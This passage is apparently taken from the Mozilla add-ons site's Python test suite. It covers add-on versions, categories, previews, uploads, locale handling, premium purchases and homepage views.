        eq_(self.addon.current_version.version, '1.2.2')

    def test_no_current_version(self):
        # No versions at all: both current and backup are None.
        for v in Version.objects.all():
            v.delete()
        self.addon.update(_current_version=None)
        eq_(self.addon.backup_version, None)
        eq_(self.addon.current_version, None)

    def test_has_backup_version(self):
        self.setup_new_version()
        assert self.addon.update_version()
        eq_(self.addon.backup_version.version, '1.1.3')
        eq_(self.addon.current_version.version, '1.2.2')

    def test_backup_version(self):
        self.setup_new_version()
        assert self.addon.update_version()
        eq_(self.addon.backup_version.version, '1.1.3')

    def test_firefox_versions(self):
        # Backup and current versions expose distinct compatibility ranges.
        self.setup_new_version()
        assert self.addon.update_version()
        backup = self.addon.backup_version.compatible_apps[amo.FIREFOX]
        eq_(backup.max.version, '3.7a5pre')
        eq_(backup.min.version, '3.0.12')
        current = self.addon.current_version.compatible_apps[amo.FIREFOX]
        eq_(current.max.version, '4.0b8pre')
        eq_(current.min.version, '3.0.12')

    def test_version_signals(self):
        self.setup_new_version()
        version = self.addon.versions.all()[0]
        assert not self.addon.backup_version
        # Saving a version should recompute backup_version on the add-on
        # (via signals — see the test name; confirm handler location).
        version.save()
        assert Addon.objects.get(pk=1865).backup_version
class TestCategoryModel(amo.tests.TestCase):

    def test_category_url(self):
        """Every type must have a url path for its categories."""
        for t in amo.ADDON_TYPE.keys():
            if t == amo.ADDON_DICT:
                continue  # Language packs don't have categories.
            cat = Category(type=AddonType(id=t), slug='omg')
            assert cat.get_url_path()

    @patch('mkt.webapps.tasks.index_webapps')
    def test_reindex_on_change(self, index_mock):
        # Changing a category's slug must reindex every app in it.
        c = Category.objects.create(type=amo.ADDON_WEBAPP, slug='keyboardcat')
        app = amo.tests.app_factory()
        AddonCategory.objects.create(addon=app, category=c)
        c.update(slug='nyancat')
        assert index_mock.called
        eq_(index_mock.call_args[0][0], [app.id])
class TestPreviewModel(amo.tests.TestCase):
    fixtures = ['base/previews']

    def test_as_dict(self):
        # as_dict() exposes exactly these keys.
        expect = ['caption', 'full', 'thumbnail']
        reality = sorted(Preview.objects.all()[0].as_dict().keys())
        eq_(expect, reality)

    def test_filename(self):
        preview = Preview.objects.get(pk=24)
        eq_(preview.file_extension, 'png')
        # An empty filetype falls back to the png extension.
        preview.update(filetype='')
        eq_(preview.file_extension, 'png')
        preview.update(filetype='video/webm')
        eq_(preview.file_extension, 'webm')

    def test_filename_in_url(self):
        # For video previews the thumbnail stays a png while the full
        # image path uses the webm extension.
        preview = Preview.objects.get(pk=24)
        preview.update(filetype='video/webm')
        assert 'png' in preview.thumbnail_path
        assert 'webm' in preview.image_path
class TestListedAddonTwoVersions(amo.tests.TestCase):
    fixtures = ['addons/listed-two-versions']

    def test_listed_two_versions(self):
        # Regression check: fetching must not raise (bug 563967).
        Addon.objects.get(id=2795)
class TestFlushURLs(amo.tests.TestCase):
    """URLs of changed images must be queued for front-end cache flushing."""
    fixtures = ['base/apps',
                'base/appversion',
                'base/platforms',
                'base/users',
                'base/addon_5579',
                'base/previews',
                'base/addon_4664_twitterbar']

    def setUp(self):
        # Point the image URL templates at STATIC_URL with a `modified`
        # cache-busting query parameter, which is_url_hashed() checks for.
        settings.ADDON_ICON_URL = (
            settings.STATIC_URL +
            'img/uploads/addon_icons/%s/%s-%s.png?modified=%s')
        settings.PREVIEW_THUMBNAIL_URL = (
            settings.STATIC_URL +
            'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
        settings.PREVIEW_FULL_URL = (
            settings.STATIC_URL +
            'img/uploads/previews/full/%s/%d.%s?modified=%d')
        # Presumably registers the flush signal handlers (paired with
        # _disconnect() in tearDown) — confirm at the definition site.
        _connect()

    def tearDown(self):
        _disconnect()

    def is_url_hashed(self, url):
        # True when the URL's query string carries a `modified` buster.
        return urlparse(url).query.find('modified') > -1

    @patch('amo.tasks.flush_front_end_cache_urls.apply_async')
    def test_addon_flush(self, flush):
        addon = Addon.objects.get(pk=159)
        addon.icon_type = "image/png"
        addon.save()
        # Both image URLs must appear in the queued flush task, hashed.
        for url in (addon.thumbnail_url, addon.icon_url):
            assert url in flush.call_args[1]['args'][0]
            assert self.is_url_hashed(url), url

    @patch('amo.tasks.flush_front_end_cache_urls.apply_async')
    def test_preview_flush(self, flush):
        addon = Addon.objects.get(pk=4664)
        preview = addon.previews.all()[0]
        preview.save()
        for url in (preview.thumbnail_url, preview.image_url):
            assert url in flush.call_args[1]['args'][0]
            assert self.is_url_hashed(url), url
class TestAddonFromUpload(UploadTest):
    """Addon.from_upload() builds add-ons/webapps from uploaded xpi,
    search and webapp files with the expected metadata."""
    fixtures = ('base/apps', 'base/users')
    def setUp(self):
        super(TestAddonFromUpload, self).setUp()
        u = UserProfile.objects.get(pk=999)
        set_user(u)
        self.platform = Platform.objects.create(id=amo.PLATFORM_MAC.id)
        for version in ('3.0', '3.6.*'):
            AppVersion.objects.create(application_id=1, version=version)
        # Some tests switch the active translation; always restore it.
        self.addCleanup(translation.deactivate)
    def manifest(self, basename):
        # Absolute path to a bundled test webapp manifest.
        return os.path.join(settings.ROOT, 'mkt', 'developers', 'tests',
                            'addons', basename)
    def test_xpi_attributes(self):
        """Metadata from the xpi install.rdf lands on the new Addon."""
        addon = Addon.from_upload(self.get_upload('extension.xpi'),
                                  [self.platform])
        eq_(addon.name, 'xpi name')
        eq_(addon.guid, 'guid@xpi')
        eq_(addon.type, amo.ADDON_EXTENSION)
        eq_(addon.status, amo.STATUS_NULL)
        eq_(addon.homepage, 'http://homepage.com')
        eq_(addon.summary, 'xpi description')
        eq_(addon.description, None)
        eq_(addon.slug, 'xpi-name')
    def test_manifest_url(self):
        upload = self.get_upload(abspath=self.manifest('mozball.webapp'))
        addon = Addon.from_upload(upload, [self.platform])
        assert addon.is_webapp()
        eq_(addon.manifest_url, upload.name)
    def test_app_domain(self):
        upload = self.get_upload(abspath=self.manifest('mozball.webapp'))
        upload.name = 'http://mozilla.com/my/rad/app.webapp'  # manifest URL
        addon = Addon.from_upload(upload, [self.platform])
        eq_(addon.app_domain, 'http://mozilla.com')
    def test_non_english_app(self):
        """The manifest's default_locale drives name locale selection."""
        upload = self.get_upload(abspath=self.manifest('non-english.webapp'))
        upload.name = 'http://mozilla.com/my/rad/app.webapp'  # manifest URL
        addon = Addon.from_upload(upload, [self.platform])
        eq_(addon.default_locale, 'it')
        eq_(unicode(addon.name), 'ItalianMozBall')
        eq_(addon.name.locale, 'it')
    def test_xpi_version(self):
        addon = Addon.from_upload(self.get_upload('extension.xpi'),
                                  [self.platform])
        v = addon.versions.get()
        eq_(v.version, '0.1')
        eq_(v.files.get().platform_id, self.platform.id)
        eq_(v.files.get().status, amo.STATUS_UNREVIEWED)
    def test_xpi_for_multiple_platforms(self):
        platforms = [Platform.objects.get(pk=amo.PLATFORM_LINUX.id),
                     Platform.objects.get(pk=amo.PLATFORM_MAC.id)]
        addon = Addon.from_upload(self.get_upload('extension.xpi'),
                                  platforms)
        v = addon.versions.get()
        # One file per requested platform.
        eq_(sorted([f.platform.id for f in v.all_files]),
            sorted([p.id for p in platforms]))
    def test_search_attributes(self):
        addon = Addon.from_upload(self.get_upload('search.xml'),
                                  [self.platform])
        eq_(addon.name, 'search tool')
        eq_(addon.guid, None)
        eq_(addon.type, amo.ADDON_SEARCH)
        eq_(addon.status, amo.STATUS_NULL)
        eq_(addon.homepage, None)
        eq_(addon.description, None)
        eq_(addon.slug, 'search-tool')
        eq_(addon.summary, 'Search Engine for Firefox')
    def test_search_version(self):
        addon = Addon.from_upload(self.get_upload('search.xml'),
                                  [self.platform])
        v = addon.versions.get()
        # Search tools get a date-stamped version on platform ALL.
        eq_(v.version, datetime.now().strftime('%Y%m%d'))
        eq_(v.files.get().platform_id, amo.PLATFORM_ALL.id)
        eq_(v.files.get().status, amo.STATUS_UNREVIEWED)
    def test_no_homepage(self):
        addon = Addon.from_upload(self.get_upload('extension-no-homepage.xpi'),
                                  [self.platform])
        eq_(addon.homepage, None)
    def test_default_locale(self):
        # Make sure default_locale follows the active translation.
        addon = Addon.from_upload(self.get_upload('search.xml'),
                                  [self.platform])
        eq_(addon.default_locale, 'en-US')
        translation.activate('es')
        addon = Addon.from_upload(self.get_upload('search.xml'),
                                  [self.platform])
        eq_(addon.default_locale, 'es')
    def test_webapp_default_locale_override(self):
        """A supported default_locale in the manifest wins."""
        with nested(tempfile.NamedTemporaryFile('w', suffix='.webapp'),
                    open(self.manifest('mozball.webapp'))) as (tmp, mf):
            mf = json.load(mf)
            mf['default_locale'] = 'es'
            tmp.write(json.dumps(mf))
            tmp.flush()
            upload = self.get_upload(abspath=tmp.name)
        addon = Addon.from_upload(upload, [self.platform])
        eq_(addon.default_locale, 'es')
    def test_webapp_default_locale_unsupported(self):
        """An unsupported default_locale falls back to en-US."""
        with nested(tempfile.NamedTemporaryFile('w', suffix='.webapp'),
                    open(self.manifest('mozball.webapp'))) as (tmp, mf):
            mf = json.load(mf)
            mf['default_locale'] = 'gb'
            tmp.write(json.dumps(mf))
            tmp.flush()
            upload = self.get_upload(abspath=tmp.name)
        addon = Addon.from_upload(upload, [self.platform])
        eq_(addon.default_locale, 'en-US')
    def test_browsing_locale_does_not_override(self):
        with translation.override('fr'):
            # Upload app with en-US as default.
            upload = self.get_upload(abspath=self.manifest('mozball.webapp'))
            addon = Addon.from_upload(upload, [self.platform])
            eq_(addon.default_locale, 'en-US')  # not fr
    @raises(forms.ValidationError)
    def test_malformed_locales(self):
        # A manifest with broken locales must be rejected outright.
        manifest = self.manifest('malformed-locales.webapp')
        upload = self.get_upload(abspath=manifest)
        Addon.from_upload(upload, [self.platform])
# Outgoing-link redirector base URL used by the external-URL tests below.
REDIRECT_URL = 'http://outgoing.mozilla.org/v1/'
class TestRemoveLocale(amo.tests.TestCase):
    """Addon.remove_locale() must delete translations only for the
    requested locale, on the add-on and on its versions."""
    def test_remove(self):
        addon = Addon.objects.create(type=1)
        addon.name = {'en-US': 'woo', 'el': 'yeah'}
        addon.description = {'en-US': 'woo', 'el': 'yeah', 'he': 'ola'}
        addon.save()
        addon.remove_locale('el')
        locales = (Translation.objects.filter(localized_string__isnull=False)
                   .values_list('locale', flat=True))
        # Only the Greek strings are gone; everything else survives.
        eq_(sorted(locales.filter(id=addon.name_id)), ['en-US'])
        eq_(sorted(locales.filter(id=addon.description_id)), ['en-US', 'he'])
    def test_remove_version_locale(self):
        addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
        version = Version.objects.create(addon=addon)
        version.releasenotes = {'fr': 'oui'}
        version.save()
        addon.remove_locale('fr')
        # No non-null translations should remain at all.
        assert not (Translation.objects.filter(localized_string__isnull=False)
                    .values_list('locale', flat=True))
class TestUpdateNames(amo.tests.TestCase):
    """Addon.update_names() adds, updates and removes localized names
    passed as a {locale: name} mapping."""
    def setUp(self):
        self.addon = Addon.objects.create(type=amo.ADDON_EXTENSION)
        self.addon.name = self.names = {'en-US': 'woo'}
        self.addon.save()
    def get_name(self, app, locale='en-US'):
        # Fetch the raw Translation row, bypassing the cache.
        return Translation.objects.no_cache().get(id=app.name_id,
                                                  locale=locale)
    def check_names(self, names):
        """`names` in {locale: name} format."""
        for locale, localized_string in names.iteritems():
            eq_(self.get_name(self.addon, locale).localized_string,
                localized_string)
    def test_new_name(self):
        names = dict(self.names, **{'de': u'frü'})
        self.addon.update_names(names)
        self.addon.save()
        self.check_names(names)
    def test_new_names(self):
        names = dict(self.names, **{'de': u'frü', 'es': u'eso'})
        self.addon.update_names(names)
        self.addon.save()
        self.check_names(names)
    def test_remove_name_missing(self):
        names = dict(self.names, **{'de': u'frü', 'es': u'eso'})
        self.addon.update_names(names)
        self.addon.save()
        self.check_names(names)
        # Now update without de to remove it.
        del names['de']
        self.addon.update_names(names)
        self.addon.save()
        names['de'] = None
        self.check_names(names)
    def test_remove_name_with_none(self):
        names = dict(self.names, **{'de': u'frü', 'es': u'eso'})
        self.addon.update_names(names)
        self.addon.save()
        self.check_names(names)
        # Now update without de to remove it.
        names['de'] = None
        self.addon.update_names(names)
        self.addon.save()
        self.check_names(names)
    def test_add_and_remove(self):
        names = dict(self.names, **{'de': u'frü', 'es': u'eso'})
        self.addon.update_names(names)
        self.addon.save()
        self.check_names(names)
        # Now add a new locale and remove an existing one.
        names['de'] = None
        names['fr'] = u'oui'
        self.addon.update_names(names)
        self.addon.save()
        self.check_names(names)
    def test_default_locale_change(self):
        names = dict(self.names, **{'de': u'frü', 'es': u'eso'})
        self.addon.default_locale = 'de'
        self.addon.update_names(names)
        self.addon.save()
        self.check_names(names)
        addon = self.addon.reload()
        eq_(addon.default_locale, 'de')
    def test_default_locale_change_remove_old(self):
        names = dict(self.names, **{'de': u'frü', 'es': u'eso', 'en-US': None})
        self.addon.default_locale = 'de'
        self.addon.update_names(names)
        self.addon.save()
        self.check_names(names)
        eq_(self.addon.reload().default_locale, 'de')
    def test_default_locale_removal_not_deleted(self):
        # Removing the default locale's name must be a no-op.
        names = {'en-US': None}
        self.addon.update_names(names)
        self.addon.save()
        self.check_names(self.names)
class TestAddonWatchDisabled(amo.tests.TestCase):
    """Disabling/enabling an add-on should hide/unhide its files via
    the post-save watcher (checked through a mocked File queryset)."""
    def setUp(self):
        self.addon = Addon(type=amo.ADDON_EXTENSION, disabled_by_user=False,
                           status=amo.STATUS_PUBLIC)
        self.addon.save()
    @patch('addons.models.File.objects.filter')
    def test_no_disabled_change(self, file_mock):
        mock = Mock()
        file_mock.return_value = [mock]
        # A plain save with no status change should touch nothing.
        self.addon.save()
        assert not mock.unhide_disabled_file.called
        assert not mock.hide_disabled_file.called
    @patch('addons.models.File.objects.filter')
    def test_disable_addon(self, file_mock):
        mock = Mock()
        file_mock.return_value = [mock]
        # User-disable should hide the files.
        self.addon.update(disabled_by_user=True)
        assert not mock.unhide_disabled_file.called
        assert mock.hide_disabled_file.called
    @patch('addons.models.File.objects.filter')
    def test_admin_disable_addon(self, file_mock):
        mock = Mock()
        file_mock.return_value = [mock]
        # Admin-disable (status change) should also hide the files.
        self.addon.update(status=amo.STATUS_DISABLED)
        assert not mock.unhide_disabled_file.called
        assert mock.hide_disabled_file.called
    @patch('addons.models.File.objects.filter')
    def test_enable_addon(self, file_mock):
        mock = Mock()
        file_mock.return_value = [mock]
        self.addon.update(status=amo.STATUS_DISABLED)
        mock.reset_mock()
        # Re-enabling should unhide, not hide.
        self.addon.update(status=amo.STATUS_PUBLIC)
        assert mock.unhide_disabled_file.called
        assert not mock.hide_disabled_file.called
class TestLanguagePack(amo.tests.TestCase, amo.tests.AMOPaths):
    """get_localepicker() extracts localepicker content from language
    pack files, but only for LPAPP add-ons on the mobile platform."""
    def setUp(self):
        super(TestLanguagePack, self).setUp()
        self.addon = amo.tests.addon_factory(type=amo.ADDON_LPAPP,
                                             status=amo.STATUS_PUBLIC)
        self.platform_all = Platform.objects.get(id=amo.PLATFORM_ALL.id)
        self.platform_mob = Platform.objects.create(id=amo.PLATFORM_ANDROID.id)
        self.version = self.addon.current_version
    def test_extract(self):
        File.objects.create(platform=self.platform_mob, version=self.version,
                            filename=self.xpi_path('langpack-localepicker'),
                            status=amo.STATUS_PUBLIC)
        assert self.addon.reload().get_localepicker()
        assert 'title=Select a language' in self.addon.get_localepicker()
    def test_extract_no_file(self):
        # An xpi without a localepicker yields an empty string.
        File.objects.create(
            platform=self.platform_mob, version=self.version,
            filename=self.xpi_path('langpack'), status=amo.STATUS_PUBLIC)
        eq_(self.addon.reload().get_localepicker(), '')
    def test_extract_no_files(self):
        eq_(self.addon.get_localepicker(), '')
    def test_extract_not_language_pack(self):
        File.objects.create(platform=self.platform_mob, version=self.version,
                            filename=self.xpi_path('langpack-localepicker'),
                            status=amo.STATUS_PUBLIC)
        assert self.addon.reload().get_localepicker()
        # Changing the type away from LPAPP disables extraction.
        self.addon.update(type=amo.ADDON_EXTENSION)
        eq_(self.addon.get_localepicker(), '')
    def test_extract_not_platform_mobile(self):
        # Files on platform ALL (not mobile) are ignored.
        File.objects.create(platform=self.platform_all, version=self.version,
                            filename=self.xpi_path('langpack-localepicker'),
                            status=amo.STATUS_PUBLIC)
        eq_(self.addon.reload().get_localepicker(), '')
class TestMarketplace(amo.tests.TestCase):
    """Premium-related predicates on Addon: is_premium() and
    can_become_premium()."""
    def setUp(self):
        self.addon = Addon(type=amo.ADDON_EXTENSION)
    def test_is_premium(self):
        assert not self.addon.is_premium()
        self.addon.premium_type = amo.ADDON_PREMIUM
        assert self.addon.is_premium()
    def test_is_premium_inapp(self):
        assert not self.addon.is_premium()
        self.addon.premium_type = amo.ADDON_PREMIUM_INAPP
        assert self.addon.is_premium()
    def test_is_premium_free(self):
        # Free-with-inapp is not considered premium.
        assert not self.addon.is_premium()
        self.addon.premium_type = amo.ADDON_FREE_INAPP
        assert not self.addon.is_premium()
    def test_can_be_premium_upsell(self):
        # An add-on that is the free side of an upsell can't go premium.
        self.addon.premium_type = amo.ADDON_PREMIUM
        self.addon.save()
        free = Addon.objects.create(type=amo.ADDON_EXTENSION)
        AddonUpsell.objects.create(free=free, premium=self.addon)
        assert not free.can_become_premium()
    def test_can_be_premium_status(self):
        # Only statuses in PREMIUM_STATUSES allow going premium.
        for status in amo.STATUS_CHOICES.keys():
            self.addon.status = status
            if status in amo.PREMIUM_STATUSES:
                assert self.addon.can_become_premium()
            else:
                assert not self.addon.can_become_premium()
    def test_webapp_can_become_premium(self):
        # Webapps may go premium regardless of status.
        self.addon.type = amo.ADDON_WEBAPP
        for status in amo.STATUS_CHOICES.keys():
            self.addon.status = status
            assert self.addon.can_become_premium(), status
    def test_can_be_premium_type(self):
        # Only a whitelist of add-on types may go premium.
        for type in amo.ADDON_TYPES.keys():
            self.addon.update(type=type)
            if type in [amo.ADDON_EXTENSION, amo.ADDON_WEBAPP,
                        amo.ADDON_LPAPP, amo.ADDON_DICT]:
                assert self.addon.can_become_premium()
            else:
                assert not self.addon.can_become_premium()
class TestAddonUpsell(amo.tests.TestCase):
    """AddonUpsell wiring between a free add-on and its premium twin."""
    def setUp(self):
        self.free_addon = Addon.objects.create(type=amo.ADDON_EXTENSION,
                                               name='free')
        self.premium_addon = Addon.objects.create(type=amo.ADDON_EXTENSION,
                                                  name='premium')
        self.upsell = AddonUpsell.objects.create(free=self.free_addon,
                                                 premium=self.premium_addon)
    def test_create_upsell(self):
        # The relation is reachable from the free side only.
        eq_(self.free_addon.upsell.free, self.free_addon)
        eq_(self.free_addon.upsell.premium, self.premium_addon)
        eq_(self.premium_addon.upsell, None)
    def test_delete(self):
        # Add a second, reversed upsell so both rows reference the addon.
        self.upsell = AddonUpsell.objects.create(free=self.premium_addon,
                                                 premium=self.free_addon)
        # Note: delete ignores if status 0.
        self.free_addon.update(status=amo.STATUS_PUBLIC)
        self.free_addon.delete()
        eq_(AddonUpsell.objects.count(), 0)
class TestAddonPurchase(amo.tests.TestCase):
    """Purchase/refund/chargeback bookkeeping on Addon."""
    fixtures = ['base/users']
    def setUp(self):
        self.user = UserProfile.objects.get(pk=999)
        self.addon = Addon.objects.create(type=amo.ADDON_EXTENSION,
                                          premium_type=amo.ADDON_PREMIUM,
                                          name='premium')
    def test_no_premium(self):
        # If you've purchased something, the fact that its now free
        # doesn't change the fact that you purchased it.
        self.addon.addonpurchase_set.create(user=self.user)
        self.addon.update(premium_type=amo.ADDON_FREE)
        assert self.addon.has_purchased(self.user)
    def test_has_purchased(self):
        self.addon.addonpurchase_set.create(user=self.user)
        assert self.addon.has_purchased(self.user)
    def test_not_purchased(self):
        assert not self.addon.has_purchased(self.user)
    def test_anonymous(self):
        # Anonymous/None users never count as purchasers.
        assert not self.addon.has_purchased(None)
        assert not self.addon.has_purchased(AnonymousUser)
    def test_is_refunded(self):
        self.addon.addonpurchase_set.create(user=self.user,
                                            type=amo.CONTRIB_REFUND)
        assert self.addon.is_refunded(self.user)
    def test_is_chargeback(self):
        self.addon.addonpurchase_set.create(user=self.user,
                                            type=amo.CONTRIB_CHARGEBACK)
        assert self.addon.is_chargeback(self.user)
    def test_purchase_state(self):
        # get_purchase_type tracks the purchase row's current type.
        purchase = self.addon.addonpurchase_set.create(user=self.user)
        for state in [amo.CONTRIB_PURCHASE, amo.CONTRIB_REFUND,
                      amo.CONTRIB_CHARGEBACK]:
            purchase.update(type=state)
            eq_(state, self.addon.get_purchase_type(self.user))
class TestQueue(amo.tests.TestCase):
    """Escalation-queue membership flag on Addon."""
    def test_in_queue(self):
        """in_escalation_queue() flips once a queue row exists."""
        app = Addon.objects.create(guid='f', type=amo.ADDON_EXTENSION)
        # Not queued yet.
        assert not app.in_escalation_queue()
        EscalationQueue.objects.create(addon=app)
        # Now queued.
        assert app.in_escalation_queue()
########NEW FILE########
__FILENAME__ = test_search
from nose.tools import eq_
import amo.tests
from addons.models import (Addon, attach_categories, attach_devices,
attach_prices, attach_tags, attach_translations)
from addons.search import extract
class TestExtract(amo.tests.TestCase):
    """addons.search.extract() mirrors Addon attributes into the
    search-index document."""
    fixtures = ['base/apps', 'base/users', 'base/addon_3615']
    def setUp(self):
        # Attributes expected to be copied verbatim into the document.
        self.attrs = ('id', 'slug', 'app_slug', 'created', 'last_updated',
                      'weekly_downloads', 'average_daily_users', 'status',
                      'type', 'hotness', 'is_disabled', 'premium_type',
                      'uses_flash')
        self.transforms = (attach_categories, attach_devices, attach_prices,
                           attach_tags, attach_translations)
    def _extract(self):
        # Load the add-on with all indexing transforms applied.
        qs = Addon.objects.filter(id__in=[3615])
        for t in self.transforms:
            qs = qs.transform(t)
        self.addon = list(qs)[0]
        return extract(self.addon)
    def test_extract_attributes(self):
        extracted = self._extract()
        for attr in self.attrs:
            eq_(extracted[attr], getattr(self.addon, attr))
########NEW FILE########
__FILENAME__ = test_utils_
from nose.tools import eq_
from addons.utils import get_featured_ids
import amo.tests
class TestGetFeaturedIds(amo.tests.TestCase):
    """get_featured_ids() filters featured add-ons by app, type and
    locale, and shuffles locale-specific entries to the front."""
    fixtures = ['addons/featured',
                'base/addon_3615', 'base/collections', 'base/featured',
                'base/users']
    # IDs featured with no locale restriction.
    no_locale = (1001, 1003, 2464, 7661, 15679)
    # IDs featured only for en-US.
    en_us_locale = (3481,)
    all_locales = no_locale + en_us_locale
    no_locale_type_one = (1001, 1003, 2464, 7661)
    def setUp(self):
        super(TestGetFeaturedIds, self).setUp()
    def test_by_app(self):
        eq_(set(get_featured_ids(amo.FIREFOX)),
            set(self.all_locales))
    def test_by_type(self):
        eq_(set(get_featured_ids(amo.FIREFOX, 'xx', 1)),
            set(self.no_locale_type_one))
    def test_by_locale(self):
        eq_(set(get_featured_ids(amo.FIREFOX)),
            set(self.all_locales))
        eq_(set(get_featured_ids(amo.FIREFOX, 'xx')),
            set(self.no_locale))
        eq_(set(get_featured_ids(amo.FIREFOX, 'en-US')),
            set(self.no_locale + self.en_us_locale))
    def test_locale_shuffle(self):
        # Make sure the locale-specific add-ons are at the front.
        ids = get_featured_ids(amo.FIREFOX, 'en-US')
        eq_((ids[0],), self.en_us_locale)
########NEW FILE########
__FILENAME__ = test_views
# -*- coding: utf-8 -*-
from datetime import datetime
import re
from django import test
from django.conf import settings
from django.core import mail
from django.core.cache import cache
from django.test.client import Client
from mock import patch
from nose import SkipTest
from nose.tools import eq_, nottest
from pyquery import PyQuery as pq
import amo
import amo.tests
from amo.helpers import absolutify, numberfmt, urlparams
from amo.urlresolvers import reverse
from abuse.models import AbuseReport
from addons.models import Addon, AddonUser
from files.models import File
from users.helpers import users_list
from users.models import UserProfile
from versions.models import Version
def norm(s):
    """Normalize a string so that whitespace is uniform and remove whitespace
    between tags."""
    collapsed = re.sub(r'\s+', ' ', str(s)).strip()
    return re.sub(r'>\s+<', '><', collapsed)
def add_addon_author(original, copy):
    """Make both add-ons share an author: copy the first listed author
    of `original` onto `copy` and return that author."""
    shared = original.listed_authors[0]
    AddonUser.objects.create(addon=copy, user=shared, listed=True)
    return shared
def check_cat_sidebar(url, addon):
    """Ensures that the sidebar shows the categories for the correct type."""
    cache.clear()
    for addon_type in (amo.ADDON_EXTENSION, amo.ADDON_SEARCH):
        addon.update(type=addon_type)
        response = Client().get(url)
        eq_(pq(response.content)('#side-nav').attr('data-addontype'),
            str(addon_type))
@nottest
def test_hovercards(self, doc, addons, src=''):
    """Shared checker: each add-on renders as a hovercard with an
    install button and a link carrying the given src parameter."""
    addons = list(addons)
    eq_(doc.find('.addon.hovercard').length, len(addons))
    for addon in addons:
        btn = doc.find('.install[data-addon=%s]' % addon.id)
        eq_(btn.length, 1)
        hc = btn.parents('.addon.hovercard')
        eq_(hc.find('a').attr('href'),
            urlparams(addon.get_url_path(), src=src))
        eq_(hc.find('h3').text(), unicode(addon.name))
class TestHomepage(amo.tests.TestCase):
    """App-specific branding on the homepage."""
    fixtures = ['base/apps']
    def setUp(self):
        self.base_url = reverse('home')
    def test_thunderbird(self):
        """Thunderbird homepage should have the Thunderbird title."""
        r = self.client.get('/en-US/thunderbird/')
        doc = pq(r.content)
        eq_('Add-ons for Thunderbird', doc('title').text())
    def test_welcome_msg(self):
        # Each app gets its own welcome blurb.
        r = self.client.get('/en-US/firefox/')
        welcome = pq(r.content)('#site-welcome').remove('a.close')
        eq_(welcome.text(),
            'Welcome to Firefox Add-ons. Choose from thousands of extra '
            'features and styles to make Firefox your own.')
        r = self.client.get('/en-US/thunderbird/')
        welcome = pq(r.content)('#site-welcome').remove('a.close')
        eq_(welcome.text(),
            'Welcome to Thunderbird Add-ons. Add extra features and styles to '
            'make Thunderbird your own.')
class TestHomepageFeatures(amo.tests.TestCase):
    """Featured/popular add-on lists on the homepage (desktop and
    mobile)."""
    fixtures = ['base/apps',
                'base/appversion',
                'base/users',
                'base/addon_3615',
                'base/collections',
                'base/global-stats',
                'base/featured',
                'addons/featured']
    def setUp(self):
        self.url = reverse('home')
    def test_no_unreviewed(self):
        # None of the homepage lists should surface unreviewed add-ons.
        response = self.client.get(self.url)
        addon_lists = 'popular featured hotness'.split()
        for key in addon_lists:
            for addon in response.context[key]:
                assert addon.status != amo.STATUS_UNREVIEWED
    def test_seeall(self):
        # What is this testing and does it make sense without bandwagon (or AMO)?
        doc = pq(self.client.get(self.url).content)
        browse_collections = reverse('collections.list')
        sections = {
            '#featured-collections': browse_collections + '?sort=featured',
        }
        for id_, url in sections.iteritems():
            # Check that the "See All" link points to the correct page.
            eq_(doc.find('%s .seeall' % id_).attr('href'), url)
    @amo.tests.mobile_test
    def test_mobile_home_extensions_only(self):
        r = self.client.get(self.url)
        addons = r.context['featured'] + r.context['popular']
        assert all([a.type == amo.ADDON_EXTENSION for a in addons]), (
            'Expected only extensions to be listed on mobile homepage')
    @amo.tests.mobile_test
    def test_mobile_home_featured(self):
        r = self.client.get(self.url)
        featured = r.context['featured']
        assert all([a.is_featured(amo.FIREFOX, 'en-US') for a in featured]), (
            'Expected only featured extensions to be listed under Featured')
    @amo.tests.mobile_test
    def test_mobile_home_popular(self):
        # Popular list must be sorted by average daily users, descending.
        r = self.client.get(self.url)
        popular = r.context['popular']
        eq_([a.id for a in popular],
            [a.id for a in sorted(popular, key=lambda x: x.average_daily_users,
                                  reverse=True)])
class TestPromobox(amo.tests.TestCase):
    """Locale-matching regression for the promo box fixture."""
    fixtures = ['addons/ptbr-promobox']
    def test_promo_box_ptbr(self):
        # bug 564355, we were trying to match pt-BR and pt-br
        res = self.client.get('/pt-BR/firefox/', follow=True)
        eq_(res.status_code, 200)
class TestDeveloperPages(amo.tests.TestCase):
    """Meet-the-developer and roadblock pages: titles, install-button
    src tracking, nl2br rendering and version selection."""
    fixtures = ['base/addon_3615', 'base/addon_592', 'base/apps',
                'base/users', 'addons/eula+contrib-addon',
                'addons/addon_228106_info+dev+bio.json',
                'addons/addon_228107_multiple-devs.json']
    def test_meet_the_dev_title(self):
        r = self.client.get(reverse('addons.meet', args=['a592']))
        title = pq(r.content)('title').text()
        eq_(title.startswith('Meet the Gmail S/MIME Developer'), True)
    def test_roadblock_title(self):
        r = self.client.get(reverse('addons.meet', args=['a592']))
        title = pq(r.content)('title').text()
        eq_(title.startswith('Meet the Gmail S/MIME Developer'), True)
    def test_meet_the_dev_src(self):
        # The install button tracks its origin via ?src=developers.
        r = self.client.get(reverse('addons.meet', args=['a11730']))
        button = pq(r.content)('.install-button a.button').attr('href')
        eq_(button.endswith('?src=developers'), True)
    def test_nl2br_info(self):
        # Newlines in the developer bio/reasons render as <br/> tags.
        r = self.client.get(reverse('addons.meet', args=['a228106']))
        eq_(r.status_code, 200)
        doc = pq(r.content)
        eq_(doc('.bio').html(),
            'Bio: This is line one.<br/><br/>This is line two')
        addon_reasons = doc('#about-addon p')
        eq_(addon_reasons.eq(0).html(),
            'Why: This is line one.<br/><br/>This is line two')
        eq_(addon_reasons.eq(1).html(),
            'Future: This is line one.<br/><br/>This is line two')
    def test_nl2br_info_for_multiple_devs(self):
        # Get an Add-on that has multiple developers,
        # which will trigger the else block in the template.
        r = self.client.get(reverse('addons.meet', args=['a228107']))
        eq_(r.status_code, 200)
        bios = pq(r.content)('.bio')
        eq_(bios.eq(0).html(),
            'Bio1: This is line one.<br/><br/>This is line two')
        eq_(bios.eq(1).html(),
            'Bio2: This is line one.<br/><br/>This is line two')
    def test_roadblock_src(self):
        url = reverse('addons.roadblock', args=['a11730'])
        # If they end up at the roadblock we force roadblock on them
        r = self.client.get(url + '?src=dp-btn-primary')
        button = pq(r.content)('.install-button a.button').attr('href')
        eq_(button.endswith('?src=dp-btn-primary'), True)
        # No previous source gets the roadblock page source
        r = self.client.get(url)
        button = pq(r.content)('.install-button a.button').attr('href')
        eq_(button.endswith('?src=meetthedeveloper_roadblock'), True)
    def test_roadblock_different(self):
        url = reverse('addons.roadblock', args=['a11730'])
        r = self.client.get(url + '?src=dp-btn-primary')
